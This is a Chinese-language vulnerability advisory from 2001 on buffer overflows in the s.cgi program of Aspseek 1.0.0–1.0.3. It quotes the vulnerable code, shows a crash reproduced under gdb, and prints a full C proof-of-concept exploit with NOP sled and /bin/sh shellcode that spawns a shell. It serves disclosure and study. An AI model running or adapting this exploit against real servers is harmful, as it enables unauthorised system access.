Aspseek存在缓冲溢出的漏洞发布时间:2001-03-20 更新时间:2001-03-20 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Aspseek v1.0.0 - 1.0.3详细描述 Aspseek搜索引擎类似于许多C/C++搜索引擎,使用MYSQL数据库作为数据存储。 一旦编译和安装完成,会在你的WEB服务器上的cgi-bin目录下留下一s.cgi的拷贝。 这个脚本一般处理搜索引擎的输入输出,接受用户定义的数据并输出搜索结果,其中 在解析用户定义数据中存在多个缓冲溢出: 1:sc.cpp程序中存在问题: int search(char *exe, char *arg) { ==> if ((env = getenv("QUERY_STRING"))) { strcpy(query_string, env); .... } <== } 这里query_string被定义为query_string[STRSIZ] = query_string[4 x 1024], 这里传递10272字符将发生缓冲溢出,但这个漏洞对远程是没有用处,因为APACHE 服务程序默认最多接受长度为8190字节的URL。 2: templates.cpp中存在问题: int CCgiQuery::ParseCgiQuery(char* query, char* templ) { ==> else if ((!STRNCMP(token, "tmpl=")) { char* tmpl = token + 5; char tmplu[2000]; sprintf(tmplu, "&tmpl=%s", tmpl); .... } <== } 上面是一个典型的缓冲溢出,超过5148个字节将导致缓冲溢出。因此可以在APACHE上 进行远程利用。 如: [root@linux cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`" [root@linux cgi-bin]# ./s.cgi Content-type: text/html <html><body>Can't open template file 'aaaaa...............'!</body></html> Segmentation Fault (core dumped) [root@linux cgi-bin]# gdb s.cgi core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-asplinux-linux"... Core was generated by `./s.cgi'. Program terminated with signal 11, Segmentation fault. #0 0x61616161 in ?? () -/Detail 测试代码 下面是一个本地利用程序,可以导致派生出一个SHELL: /* * Aspseek v1.0.0 - 1.0.3 -Proof of Concept eXploit- * Tested on Redhat 7.0, Asplinux RC3 (v1.1) * * by: NeilK (neilk@alldas.de/neil@alldas.de) * http://neilk.alldas.de * * Local proof of concept buffer overflow exploit for s.cgi * its not suid/sgid but it can be remote :) * * Line #1228 - templates.cpp * char* tmpl = token + 5; * char tmplu[2000]; * sprintf(tmplu, "&tmpl=%s", tmpl) * * greetz: mjm, all @alldas.de */ #include <stdio.h> #include <string.h> #include <stdlib.h> #define NOP 0x90 #define BUFSIZE 5148 #define OFFSET -200 #define RETURNS 2 unsigned char shellcode[] = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[BUFSIZE]; int i, offset; unsigned long ret; fprintf(stderr, "Aspseek v1.0.3 -Proof of Concept eXploit-\n"); fprintf(stderr, "by neilk@alldas.de/neil@alldas.de\n"); if (argc > 1) offset = atoi(argv[1]); else offset = OFFSET; memcpy(buffer, "q=a&tmpl=", 9); for (i = 9; i < (BUFSIZE - strlen(shellcode) - (RETURNS*4)); i++) *(buffer + i) = NOP; memcpy (buffer + i, shellcode, strlen(shellcode)); ret = get_sp(); for (i = BUFSIZE - (RETURNS*4); i < BUFSIZE; i += 4) *(long *) &buffer[i] = ret+offset; buffer[BUFSIZE] = '\0'; fprintf(stderr, "[return address = %p] [offset = %d] [buffer size = %d]\n", ret + offset, offset, strlen(buffer)); setenv("QUERY_STRING", buffer, 1); execl("./s.cgi", "s.cgi", NULL); exit(1); } 解决方案 尚无 相关信息 本信息有NeilK (neil@alldas.de/neilk@alldas.de) www.alldas.de提供。 |
